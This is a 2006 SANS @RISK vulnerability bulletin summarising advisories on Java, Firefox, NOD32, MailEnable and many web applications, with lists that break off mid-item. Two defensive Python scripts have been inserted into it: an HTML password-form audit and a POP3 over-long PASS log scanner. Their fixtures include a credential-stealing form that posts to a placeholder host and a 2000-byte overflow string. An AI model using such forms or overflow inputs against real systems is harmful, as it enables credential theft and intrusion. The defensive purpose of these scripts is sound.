@RISK: The Consensus Security Vulnerability Alert

Volume: V, Issue: 51
December 26, 2006

Both Firefox and the Java Runtime Environment and SDK have high-risk vulnerabilities that need attention because they are easy to exploit.

All of us at SANS hope you have a healthy and satisfying year in 2007. We look forward to your comments, contributions, and criticisms, and to seeing you at one of SANS educational programs.

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    Platform                                 Number of Updates and Vulnerabilities
    - ------------------------               -------------------------------------
    Windows                                  4 (#3)
    Microsoft Office                         2
    Third Party Windows Apps                 7 (#5, #6, #8)
    Mac Os                                   1
    Linux                                    2
    Cross Platform                           18 (#1, #2, #4)
    Web Application - Cross Site Scripting   4
    Web Application - SQL Injection          4
    Web Application                          31 (#7)
    Network Device                           3
    ______________________________________________________________________
Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Windows
Microsoft Office
Third Party Windows Apps
Mac Os
Linux
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application
Network Device
PART I Critical Vulnerabilities

Part I for this issue has been compiled by Rob King and Rohit Dhamankar at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (2) HIGH: Sun Java Runtime Environment Multiple Vulnerabilities
  • Affected:
    • Sun JDK and JRE 5.0 Update 7 and prior
    • Sun SDK and JRE 1.4.2_12 and prior
    • Sun SDK and JRE 1.3.1_18 and prior
  • Description: The Sun Java Runtime Environment and the Sun Java Software Developer Kit (SDK) contain multiple vulnerabilities. These vulnerabilities include remote code execution, privilege escalation, and information disclosure. If a user browses a webpage containing a malicious Java applet, the applet may be able to execute arbitrary code on the client system with the privileges of the logged-on user. Note that Java applets are automatically downloaded and executed in typical browser configurations. Also, the Sun Java Runtime Environment is installed by default on Microsoft Windows systems prior to Windows XP, on many Unix and Unix-like operating systems (including Sun Solaris), and on many Linux distributions. Previous flaws in the JRE have been exploited to compromise systems in the wild; hence, this update should be applied on an expedited basis.

  • Status: Sun confirmed, updates available.

  • Council Site Actions: All reporting council sites are responding to this issue. They are either relying on the vendors' Auto Update feature or they plan to distribute the updates during their next regularly scheduled system maintenance cycle.

  • References:
  • (4) LOW: Mozilla Firefox Information Disclosure
  • Affected:
    • Mozilla Firefox versions 2.0.1 and prior
  • Description: Mozilla Firefox's password manager component contains an information disclosure weakness. The password manager can be used to automatically fill out username and password forms. If this capability is used on web pages that can have arbitrary HTML code included by an attacker, the attacker could obtain these username and password entries. This vulnerability can be exploited to conduct phishing attacks such as stealing MySpace passwords. Note that this issue is distinct from the other Mozilla issues outlined in this edition of @RISK. A proof of concept for this vulnerability is publicly available.

  • Status: Mozilla confirmed, updates available.

  • Council Site Actions: All reporting council sites are using Mozilla, although it is not officially supported by their respective IT departments. Thus, all sites are relying on Mozilla's Auto Update features to install the latest updates.

  • References:
    • Mozilla Bugzilla Entry https://bugzilla.mozilla.org/show_bug.cgi?id=360493
    • Posting by fash1on@gmail.com http://www.securityfocus.com/archive/1/452382
    • Proof of Concept http://www.info-svc.com/news/11-21-2006/rcsr1/
    • Article by Chapin Information Services http://www.info-svc.com/news/11-21-2006/
    • SecurityFocus BID http://www.securityfocus.com/bid/21240
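The weakness described in item (4) is that the browser fills a saved username and password into a form because of the page it appears on, not because of who wrote the form. A site that lets contributors embed HTML therefore has to keep forms out of user-supplied content. The following is an added example, not code from the @RISK bulletin, from Mozilla, or from the linked proof of concept: a Python audit that scans stored user HTML for any form containing a password field and reports whether the form posts to a host other than the site's own. The site host `www.example.com`, the sample snippets and the placeholder host `collector.invalid` are all constructed for the example.

```python
"""Audit user-supplied HTML for forms that a browser password manager would fill.

Added example (not from the @RISK bulletin or Mozilla). Assumptions: the site
stores contributor HTML after sanitizing it, and the policy is that stored
content must contain no form with a password input at all. The 'off_site'
flag additionally shows which forms would deliver their contents elsewhere.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "www.example.com"  # constructed placeholder for the site's own host


class _FormAudit(HTMLParser):
    """Collect every <form> that contains an <input type="password">."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._form = None  # attributes of the <form> currently open, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lowercases tag and attribute names
        if tag == "form":
            self._form = {"action": a.get("action") or "", "has_password": False}
        elif tag == "input" and self._form is not None:
            # a missing type attribute means a text input
            if (a.get("type") or "text").lower() == "password":
                self._form["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._finish_form()

    def close(self):
        super().close()
        self._finish_form()  # an unclosed <form> still counts

    def _finish_form(self):
        if self._form is None:
            return
        if self._form["has_password"]:
            # hostname strips any port and lowercases; relative actions give None
            host = urlparse(self._form["action"]).hostname or ""
            self.findings.append({
                "action": self._form["action"],
                # relative actions and the site's own host stay on-site
                "off_site": bool(host) and host != self.site_host,
            })
        self._form = None


def audit_user_html(html, site_host=SITE_HOST):
    """Return one finding per form containing a password input."""
    p = _FormAudit(site_host)
    p.feed(html)
    p.close()
    return p.findings


def is_acceptable_user_html(html, site_host=SITE_HOST):
    """Policy check: contributor content may not carry any password form."""
    return not audit_user_html(html, site_host)


# Constructed samples of stored user content
CLEAN_COMMENT = "<p>Great profile! Visit <a href='/u/bob'>bob</a>.</p>"

# A copy of a login form that still posts to the site itself
SAME_SITE_FORM = ("<form action='/login' method='post'>"
                  "<input name='u'><input type='password' name='p'></form>")

# A form whose action leaves the site; collector.invalid is a placeholder host
OFF_SITE_FORM = ("<div><form action='http://collector.invalid/c'>"
                 "<input name='u'><input type='PASSWORD' name='p'></form></div>")

if __name__ == "__main__":
    for label, snippet in (("clean", CLEAN_COMMENT), ("same-site", SAME_SITE_FORM),
                           ("off-site", OFF_SITE_FORM)):
        print(label, "acceptable" if is_acceptable_user_html(snippet) else "rejected",
              audit_user_html(snippet))
```

The policy deliberately rejects the same-site copy as well as the off-site one: a password manager cannot tell a contributor's copy of the login form from the real one, so the only safe rule for user content is no password forms at all. The `off_site` flag is there for triage, not for deciding acceptance.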

Other Software
  • (5) HIGH: ESET NOD32 CAB Parsing Heap Overflow
  • Affected:
    • ESET NOD32 Antivirus versions prior to 1.1743
  • Description: ESET NOD32, a popular antivirus solution, contains a heap overflow in its handling of CAB ("cabinet") archive files. A specially-crafted CAB file could exploit this vulnerability and execute arbitrary code with the privileges of the scanning process.

  • Status: ESET confirmed, updates available.

  • Council Site Actions: The affected software and/or configuration are not in production or widespread use, or are not officially supported at any of the council sites. They reported that no action was necessary.

  • References:
  • (6) HIGH: MailEnable POP3 PASS Command Buffer Overflow
  • Affected:
    • MailEnable Professional and Enterprise Editions versions 2.35 and possibly prior
  • Description: MailEnable, a popular mail solution for Microsoft Windows systems, contains a buffer overflow vulnerability in the POP server's PASS command implementation. An unauthenticated attacker can send an overly-long argument to the PASS command, and exploit this buffer overflow to execute arbitrary code with the privileges of the POP server. Exploit code for the previously disclosed flaws can be easily modified to leverage this flaw.

  • Status: MailEnable confirmed, updates available.

  • Council Site Actions: The affected software and/or configuration are not in production or widespread use, or are not officially supported at any of the council sites. They reported that no action was necessary.

  • References:
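Item (6) above names the trigger precisely: an unauthenticated client sends an overly long argument to the POP3 PASS command. RFC 1939 limits each POP3 command argument to 40 characters, so a defender can alert on arguments well past that limit without knowing the exact overflow length for a given server. The following is an added example, not code from the @RISK bulletin or from MailEnable: a Python scanner that walks a POP3 command log, records only the length of each PASS argument (never the value), and reports those that exceed the RFC limit. The log line format and the sample entries are constructed for this example.

```python
"""Flag over-long POP3 PASS arguments in a command log.

Added example (not from the @RISK bulletin or MailEnable). It assumes a
constructed log format of "<timestamp> <client-ip> C: <raw command line>"
for client commands (server replies use "S:" and are ignored).
"""
import re
from dataclasses import dataclass

# RFC 1939 section 3: "Each argument may be up to 40 characters long."
RFC1939_MAX_ARG = 40

# Constructed log format: "<timestamp> <client-ip> C: <raw command line>"
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) C: (?P<cmd>.*)$")


@dataclass
class Finding:
    ts: str
    client: str
    keyword: str
    arg_len: int  # length only; the argument itself is never retained


def parse_command(raw: str):
    """Split a POP3 command line into (KEYWORD, argument-string)."""
    raw = raw.rstrip("\r\n")
    if not raw:
        return "", ""
    parts = raw.split(" ", 1)
    keyword = parts[0].upper()
    arg = parts[1] if len(parts) > 1 else ""
    return keyword, arg


def scan_pop3_log(lines, keywords=("PASS",), max_arg=RFC1939_MAX_ARG):
    """Return a Finding for every inspected command whose argument exceeds max_arg.

    Only the keywords listed are inspected; by default just PASS, the command
    named in the MailEnable advisory. Widening keywords or lowering max_arg
    turns this into a general check for over-long POP3 arguments.
    """
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a client command line
        keyword, arg = parse_command(m.group("cmd"))
        if keyword in keywords and len(arg) > max_arg:
            findings.append(Finding(m.group("ts"), m.group("ip"), keyword, len(arg)))
    return findings


# Constructed sample: a normal login followed by a suspiciously long PASS.
SAMPLE_LOG = [
    "2006-12-20T10:01:02Z 192.0.2.10 C: USER alice",
    "2006-12-20T10:01:03Z 192.0.2.10 C: PASS correct-horse-battery",
    "2006-12-20T10:01:04Z 192.0.2.10 C: STAT",
    "2006-12-20T10:05:00Z 198.51.100.7 C: USER bob",
    "2006-12-20T10:05:01Z 198.51.100.7 C: PASS " + "A" * 2000,
    "2006-12-20T10:05:02Z 198.51.100.7 S: -ERR",
]

if __name__ == "__main__":
    for f in scan_pop3_log(SAMPLE_LOG):
        print(f"{f.ts} {f.client}: {f.keyword} argument of {f.arg_len} bytes "
              f"exceeds the RFC 1939 limit of {RFC1939_MAX_ARG}")
```

The same check covers the Part II entry 06.51.9 for this flaw. Keeping only the argument length in the finding matters in practice: a detection pipeline that copied PASS arguments into alerts would itself become a store of cleartext passwords.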
  • (7) HIGH: Typo3 Multiple Remote Command Execution Vulnerabilities
  • Affected:
    • Typo3 versions 4.0 - 4.3, 4.1beta
    • Typo3 versions 3.7 and 3.8
  • Description: Typo3, a popular content management system, contains multiple remote command execution vulnerabilities. By passing a specially-crafted request to the application, an attacker could execute arbitrary commands with the privileges of the server process. Note that versions 3.7 and 3.8 are not vulnerable in their default configuration. Technical details and a proof-of-concept are publicly available for these vulnerabilities.

  • Status: Typo3 confirmed, updates available.

  • Council Site Actions: The affected software and/or configuration are not in production or widespread use, or are not officially supported at any of the council sites. They reported that no action was necessary.

  • References:
  • (8) HIGH: McAfee NeoTrace ActiveX Control Buffer Overflow
  • Affected:
    • NeoTrace Express 3.25
    • NeoTrace Pro/McAfee Visual Trace 3.25
    • Other versions may also be vulnerable.
  • Description: McAfee NeoTrace software enables a user to run traceroute, whois and similar utilities against any computer that is trying to connect to the user's system, and displays the information graphically. The NeoTraceExplorer.NeoTraceLoader ActiveX control that ships with the NeoTrace software contains a stack-based overflow. The overflow can be triggered by passing an overly long string (500 bytes or more) as an argument to the ActiveX control's "TraceTarget" method. A malicious webpage can exploit the flaw to execute arbitrary code on NeoTrace users' systems. McAfee Visual Trace may be bundled with a number of McAfee products, thereby increasing the number of vulnerable systems.

  • Status: McAfee has not confirmed the flaw; no fixes available.

  • References:
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 51, 2006

This list is compiled by Qualys (www.qualys.com) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 5314 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.


  • 06.51.1 - CVE: Not Available
  • Platform: Windows
  • Title: Sambar FTP Server Remote Denial of Service
  • Description: Sambar FTP Server is vulnerable to a remote denial of service issue when a long sequence of "./" characters (160 or more) is processed. Sambar FTP Server version 6.4 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/21617/info

  • 06.51.2 - CVE: Not Available
  • Platform: Windows
  • Title: Star FTP Server RETR Command Remote Denial of Service
  • Description: Star FTP Server is a File Transfer Protocol Daemon available for Microsoft Windows. The application is exposed to a remote denial of service issue that affects the processing of "RETR" commands. Star FTP Server version 1.10 is affected.
  • Ref: http://www.securityfocus.com/bid/21630/info http://milw0rm.com/exploits/2942

  • 06.51.3 - CVE: Not Available
  • Platform: Windows
  • Title: Microsoft Windows Explorer and Media Player Denial of Service
  • Description: Microsoft Windows Explorer and Windows Media Player are both exposed to a denial of service issue. Please see the link below for further details.
  • Ref: http://www.securityfocus.com/archive/1/454502

  • 06.51.4 - CVE: Not Available
  • Platform: Windows
  • Title: Microsoft Windows MessageBoxA Denial of Service
  • Description: Microsoft Windows is prone to a local denial of service vulnerability because the operating system fails to handle certain API calls with unexpected parameters. Specifically, the vulnerability occurs when the executable makes an API call to the "MessageBoxA" message box and passes certain malicious parameters.
  • Ref: http://www.securityfocus.com/bid/21688

  • 06.51.5 - CVE: Not Available
  • Platform: Microsoft Office
  • Title: Microsoft Project Server 2003 PDSRequest.ASP XML Request Information Disclosure
  • Description: Microsoft Project Server 2003 is prone to an information disclosure vulnerability when an XML request in the "/logon/pdsrequest.asp" script is sent to the HTTP server.
  • Ref: http://www.securityfocus.com/bid/21611

  • 06.51.6 - CVE: Not Available
  • Platform: Microsoft Office
  • Title: Microsoft Outlook ActiveX Control Remote Internet Explorer Denial of Service
  • Description: The Microsoft Office Outlook Recipient Control is exposed to a denial of service issue due to a flawed interaction between Microsoft Outlook and Internet Explorer. Microsoft Outlook XP and prior versions are affected.
  • Ref: http://www.securityfocus.com/bid/21649/info

  • 06.51.7 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Yahoo! Messenger Unspecified ActiveX Control Remote Buffer Overflow
  • Description: Yahoo! Messenger is a freely available chat client distributed and maintained by Yahoo!. An unspecified ActiveX control shipped with Yahoo! Messenger is prone to a buffer overflow vulnerability because it fails to perform sufficient bounds checking of user-supplied input before copying it to an insufficiently sized memory buffer. Yahoo! Messenger versions released prior to November 2, 2006 are affected.
  • Ref: http://messenger.yahoo.com/security_update.php?id=120806

  • 06.51.8 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Intel 2200BG 802.11 Driver Beacon Frame Remote Code Execution
  • Description: Intel 2200BG driver is prone to a remote code execution vulnerability due to a race condition which occurs when "w29n51.sys" fails to properly handle a flood of malformed beacon frames. Intel 2200BG (Mini-PCI) driver version 9.0.3.9 is affected.
  • Ref: http://www.securityfocus.com/bid/21641

  • 06.51.9 - CVE: CVE-2006-6605
  • Platform: Third Party Windows Apps
  • Title: MailEnable POP Service PASS Command Remote Buffer Overflow
  • Description: MailEnable is a commercially available mail server. It is prone to a stack-based buffer overflow vulnerability in the POP service that occurs when the application handles excessively long parameters to the "PASS" command. MailEnable version 2.35 is reportedly vulnerable.
  • Ref: http://www.securityfocus.com/bid/21645

  • 06.51.10 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: AstonSoft DeepBurner DBR Compilation Buffer Overflow
  • Description: AstonSoft DeepBurner is a CD and DVD burning application. It is prone to a remote buffer overflow vulnerability. The vulnerability affects the "file name" tag located in DBR files which contain a listing to be included in a CD/DVD burning project. The application does not allocate a sufficient sized buffer for user-supplied data in these files, allowing an attacker to corrupt process memory by supplying more than 272 bytes as input for the "file name" tag. AstonSoft DeepBurner version 1.8.0 is affected.
  • Ref: http://www.securityfocus.com/bid/21657

  • 06.51.11 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Ozeki HTTP-SMS Gateway Password Information Disclosure
  • Description: Ozeki HTTP-SMS Gateway is an application that allows users to send and receive a large volume of SMS messages over an IP SMS connection. This application is exposed to an information disclosure vulnerability. This issue occurs because the application fails to protect sensitive information. Specifically, the usernames and passwords of users are stored in clear text under the "HKEY_LOCAL_MACHINESoftwareOzekiSMSServerCurrentVersionPluginshttpsmsgate" registry key. This registry key is readable by all users. This issue affects version 1.0.
  • Ref: http://www.securityfocus.com/bid/21679

  • 06.51.12 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: NOD32 Anti-Virus Multiple File Parsing Vulnerabilities
  • Description: NOD32 Anti-Virus is an anti-virus application available for Microsoft Windows. It is exposed to a divide by zero issue when attempting to process CHM files and also to a heap-based buffer overflow issue when attempting to process DOC files. NOD32 Anti-Virus versions prior to 1.1743 are affected.
  • Ref: http://www.securityfocus.com/bid/21682

  • 06.51.13 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: McAfee NeoTrace ActiveX Control Remote Buffer Overflow
  • Description: NeoTrace is a utility that allows users to map computers on the Internet. The NeoTraceExplorer.NeoTraceLoader ActiveX control is vulnerable to a buffer overflow issue when receiving a string of over 500 bytes to the "TraceTarget()" function. McAfee NeoTrace Express version 3.25 and NeoTrace Professional version 3.25 are vulnerable.
  • Ref: http://www.securityfocus.com/bid/21697

  • 06.51.14 - CVE: Not Available
  • Platform: Mac Os
  • Title: Apple Mac OS X Quicktime For Java Information Disclosure
  • Description: Apple Mac OS X is exposed to an information disclosure issue. Specifically, the vulnerability occurs when Java applets use "Quicktime for Java" to retrieve images rendered on screen by embedded Quicktime objects. Attackers may combine this with Quartz Composer to capture images that contain local information. Apple Mac OS X version 10.4.8 is affected.
  • Ref: http://www.securityfocus.com/bid/21672

  • 06.51.15 - CVE: CVE-2006-6106
  • Platform: Linux
  • Title: Linux Kernel Bluetooth CAPI Packet Remote Buffer Overflow
  • Description: The Linux kernel is prone to a buffer overflow vulnerability because it fails to bounds check user-supplied data before copying it into an insufficiently sized buffer. Specifically, this issue occurs when the Bluetooth driver attempts to handle excessively large CAPI packets. Versions prior to 2.4.33.5 are affected.
  • Ref: http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.33.5

  • 06.51.16 - CVE: CVE-2006-4814
  • Platform: Linux
  • Title: Linux Kernel MinCore User Space Access Locking Local Denial of Service
  • Description: The Linux kernel is exposed to a denial of service issue due to a design error in "mincore()", a system call used to determine the residency of memory pages. Linux Kernel versions prior to 2.4.33.6 are affected.
  • Ref: http://www.securityfocus.com/bid/21663/info

  • 06.51.17 - CVE: CVE-2006-5872
  • Platform: Cross Platform
  • Title: SQL-Ledger Unspecified Code Execution
  • Description: SQL-Ledger is a double entry accounting system. It is exposed to a remote code execution issue because the application fails to properly sanitize input to unspecified parameters. SQL-Ledger versions 2.6 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/21634/info

  • 06.51.18 - CVE: Not Available
  • Platform: Cross Platform
  • Title: IBM WebSphere Utility Classes Unspecified Vulnerability
  • Description: IBM WebSphere Application Server is a framework for supporting various enterprise web applications. It is prone to an unspecified vulnerability that is likely to be related to the handling of Java utility classes. IBM WebSphere Application Server versions prior to 5.1.1.13 are reportedly vulnerable.
  • Ref: http://www-1.ibm.com/support/docview.wss?uid=swg24014231

  • 06.51.19 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Multiple Vendor Firewall HIPS Process Spoofing Vulnerability
  • Description: Multiple vendor firewalls and HIPS (host-based intrusion prevention systems) are prone to a process spoofing vulnerability. An attacker can exploit this issue to have an arbitrary malicious program appear to run as a trusted process and function undetected on an affected victim's computer. Please see the advisory for further information.
  • Ref: http://www.securityfocus.com/bid/21615

  • 06.51.20 - CVE: Not Available
  • Platform: Cross Platform
  • Title: OpenOffice Remote Integer Overflow Denial of Service
  • Description: OpenOffice is exposed to a remote denial of service issue because of an integer overflow flaw in the "WW8PLCF::GeneratePLCF()" method when attempting to process malformed Word files. OpenOffice version 2.1 is vulnerable to this issue.
  • Ref: http://www.securityfocus.com/archive/1/454514 http://www.securityfocus.com/bid/21618/info

  • 06.51.21 - CVE: CVE-2006-6475,CVE-2006-6476,CVE-2006-6477
  • Platform: Cross Platform
  • Title: Mandiant First Response Multiple Denial of Service and Agent Hijacking Vulnerabilities
  • Description: Mandiant First Response is an incident-response tool to collect system information such as running processes, system services, registry information, and event logs. It is affected by a denial of service and agent hijack issue. Mandiant First Response version 1.1 is affected.
  • Ref: http://www.securityfocus.com/bid/21548

  • 06.51.22 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Multiple BitDefender Products Parsing Engine Integer Overflow Vulnerabilities
  • Description: Multiple BitDefender applications are exposed to an integer overflow issue because they fail to ensure that integer values are not overrun. When the applications parse crafted packed PE files, a heap-based buffer overflow occurs, resulting from the integer overflow issue. BitDefender for MS Exchange 5.5 0 and prior versions are affected.
  • Ref: http://www.bitdefender.com/KB323-en--cevakrnl.xmd-vulnerability.html http://www.securityfocus.com/bid/21610

  • 06.51.23 - CVE: Not Available
  • Platform: Cross Platform
  • Title: ITalk Plus Multiple Remote Pre-Authentication Buffer Overflow Vulnerabilities
  • Description: Italk Plus is a freely available chat application available for Windows, Unix and Unix-like operating systems. It is susceptible to multiple remote buffer overflow issues due to the application's failure to properly bounds check user-supplied input before copying it to insufficiently sized memory buffers. Italk Plus versions prior to 0.92.1 are affected.
  • Ref: http://italk.sourceforge.net/italk-sa-1.txt

  • 06.51.24 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Kerio MailServer Remote Unspecified LDAP Denial of Service
  • Description: Kerio MailServer is prone to a denial of service vulnerability because the software fails to properly handle malformed LDAP traffic, resulting in an application crash. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/21602

  • 06.51.25 - CVE: Not Available
  • Platform: Cross Platform
  • Title: IBM DB2 Remote SQLJRA Packet Denial of Service
  • Description: DB2 Universal Database is a database management application written for use on multiple platforms. DB2 Universal Database is affected by a denial of service vulnerability due to a failure of the "sqle_db2ra_as_recvrequest()" function to properly handle malformed "SQLJRA" packets.
  • Ref: http://www-1.ibm.com/support/docview.wss?uid=swg1IY86917

  • 06.51.26 - CVE: Not Available
  • Platform: Cross Platform
  • Title: GNU Wget FTP_Syst Function Remote Denial of Service
  • Description: GNU Wget is a non-interactive command line application to retrieve files using HTTP, HTTPS and FTP. It is prone to a remote denial of service issue in the "ftp_syst()" function when processing an excessive amount of FTP "220" status codes. GNU Wget version 1.10.2 is affected.
  • Ref: http://www.securityfocus.com/bid/21650

  • 06.51.27 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sun Java Runtime Environment Multiple Remote Privilege Escalation Vulnerabilities
  • Description: Sun Java Runtime Environment is an enterprise development platform. It is vulnerable to multiple unspecified privilege escalation issues. See the advisory for further details.
  • Ref: http://www.securityfocus.com/bid/21673

  • 06.51.28 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sun Java Runtime Environment Information Disclosure Vulnerabilities
  • Description: The Sun Java Runtime Environment is prone to multiple information disclosure vulnerabilities. These issues are due to a design flaw in the affected application. Specifically, untrusted applets are inappropriately allowed to access data from other applets in two different circumstances.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102732-1&searchclause=

  • 06.51.29 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sun Java RunTime Environment Multiple Buffer Overflow Vulnerabilities
  • Description: The Java Runtime Environment is an application that allows users to run Java applications. It is prone to multiple unspecified buffer overflow vulnerabilities. Please refer to the advisory for further information.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102729-1&searchclause=

  • 06.51.30 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Oracle Portal Calendar.JSP HTTP Response Splitting
  • Description: Oracle Portal is a portal application that is tightly integrated with Oracle's application server software. It is exposed to an HTTP response splitting issue because it fails to properly sanitize user-supplied input to the "enc" parameter of the "calendar.jsp" script before saving data to the Oracle Web Cache. Oracle Portal version 10g is affected.
  • Ref: http://www.securityfocus.com/archive/1/454945

  • 06.51.31 - CVE: Not Available
  • Platform: Cross Platform
  • Title: RealNetworks RealPlayer ActiveX Control Remote Denial of Service
  • Description: RealNetworks RealPlayer is prone to a denial of service issue. The ActiveX control with a CLSID from the "rpau3260.dll" library is exposed to a denial of service issue. RealPlayer version 10.5 is affected.
  • Ref: http://www.securityfocus.com/bid/21689

  • 06.51.32 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Hitachi Directory Server LDAP Request Handling Multiple Vulnerabilities
  • Description: Hitachi LDAP Directory Server contains multiple denial of service vulnerabilities which are only reported to affect the Microsoft Windows and HP-UX versions of the application. These issues arise when the server handles specially-crafted LDAP requests. Please refer to the attached advisory for details.
  • Ref: http://www.securityfocus.com/bid/21692

  • 06.51.33 - CVE: Not Available
  • Platform: Cross Platform
  • Title: ESET NOD32 Antivirus CAB File Parsing Engine Integer Overflow
  • Description: ESET NOD32 Antivirus is an antivirus application. It is vulnerable to an integer overflow issue as it fails to ensure that integer values are not overrun. Versions prior to 1.1743 are affected.
  • Ref: http://www.securityfocus.com/bid/21701/info

  • 06.51.34 - CVE: Not Available
  • Platform: Cross Platform
  • Title: HTTP Explorer Web Server Directory Traversal
  • Description: HTTP Explorer is a webserver. It is vulnerable to a directory traversal issue when specially-crafted HTTP GET requests contain directory traversal strings. HTTP Explorer version 1.02 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/21712

  • 06.51.35 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Omniture SiteCatalyst Multiple Cross-Site Scripting Vulnerabilities
  • Description: Omniture SiteCatalyst is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input to the "ss" parameter of the "search.asp" script. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/21620

  • 06.51.36 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: osTicket Support Cards View.PHP Cross Site Scripting
  • Description: osTicket Support Cards is a web-based customer support application. It is prone to a cross site scripting issue because it fails to properly sanitize user-supplied input to the "e" parameter of the "view.php" script. osTicket versions 1.3 beta and 1.2.7 are affected.
  • Ref: http://www.securityfocus.com/bid/21669

  • 06.51.37 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Mini Web Shop View.PHP Viewcategory.PHP Cross-Site Scripting
  • Description: Mini Web Shop is a web-based customer support application implemented in PHP. The application is exposed to a cross-site scripting issue due to improper sanitization of user-supplied input to the "catname" parameter of the "viewcategory.php" script. Mini Web Shop version 2.1.c is affected.
  • Ref: http://www.securityfocus.com/bid/21677/info

  • 06.51.38 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: SugarCRM Sugar Open Source Multiple Unspecified Cross-Site Scripting Vulnerabilities
  • Description: Sugar Open Source is a suite of customer relationship management software. The application is exposed to multiple unspecified cross-site scripting issues as it fails to sufficiently sanitize user-supplied input. Sugar Open Source versions prior to 4.5.0g are affected.
  • Ref: http://www.securityfocus.com/bid/21694/info

  • 06.51.39 - CVE: CVE-2006-6595
  • Platform: Web Application - SQL Injection
  • Title: ScriptMate User Manager Multiple SQL Injection Vulnerabilities
  • Description: ScriptMate User Manager is a platform for registering and managing members and for securing ASP pages. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to the "mesid" parameter of the "/smusermanager/utilities/usermessages.asp" script. ScriptMate User Manager versions 2.1 and 2.0 are vulnerable.
  • Ref: http://www.hackerscenter.com/archive/view.asp?id=26656

  • 06.51.40 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Contra Haber Sistemi Haber.ASP SQL Injection
  • Description: Contra Haber Sistemi is a web application implemented in ASP. The application is exposed to an SQL injection issue due to insufficient sanitization of user-supplied data to the "id" parameter of the "haber.asp" script before using it in an SQL query. Contra Haber Sistemi version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/21626/info http://www.securityfocus.com/archive/1/454594

  • 06.51.41 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Upload_download_de_fichiers Administre2.PHP SQL Injection
  • Description: The Upload_download_de_fichiers application is a file transfer tool. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "id_user" parameter of the "administre2.php" script. Upload_download_de_fichiers version 3 is affected.
  • Ref: http://www.securityfocus.com/bid/21648/info

  • 06.51.42 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Burak Yilmaz Download Portal Down.ASP SQL Injection
  • Description: Burak Yilmaz Download Portal is a web application. It is exposed to an SQL injection issue due to insufficient sanitization of user-supplied data to the "id" parameter of the "down.asp" script. MaxiASP Burak Yilmaz Download Portal version 0 is affected.
  • Ref: http://www.securityfocus.com/bid/21676

  • 06.51.43 - CVE: CVE-2006-6636
  • Platform: Web Application
  • Title: IBM WebSphere Application Server Multiple Remote Vulnerabilities
  • Description: IBM WebSphere Application Server is a utility designed to facilitate the creation of various enterprise web applications. It is vulnerable to multiple remote vulnerabilities. IBM WebSphere Application Server versions prior to 6.0.2 Fix Pack 17 are vulnerable. See the advisory for further details.
  • Ref: http://www-1.ibm.com/support/docview.wss?uid=swg27006879

  • 06.51.44 - CVE: Not Available
  • Platform: Web Application
  • Title: Knusperleicht Shoutbox Shout.php HTML Injection
  • Description: Knusperleicht Shoutbox adds message and comment posting functionality to web sites. It is prone to an HTML injection issue because it fails to properly sanitize user-supplied input to the "shout.php" script before using it in dynamically generated content. Knusperleicht Shoutbox version 2.6 is vulnerable and other versions may also be affected.
  • Ref: http://www.securityfocus.com/bid/21637

  • 06.51.45 - CVE: Not Available
  • Platform: Web Application
  • Title: Azucar CMS Index_sitios.PHP Remote File Include
  • Description: Azucar CMS is a web-based content management system. It is prone to a remote file include vulnerability due to insufficient sanitization of the "$_GET[_VIEW]" parameter of the "admin/index_sitios.php" script. Azucar CMS version 1.3 is reportedly vulnerable.
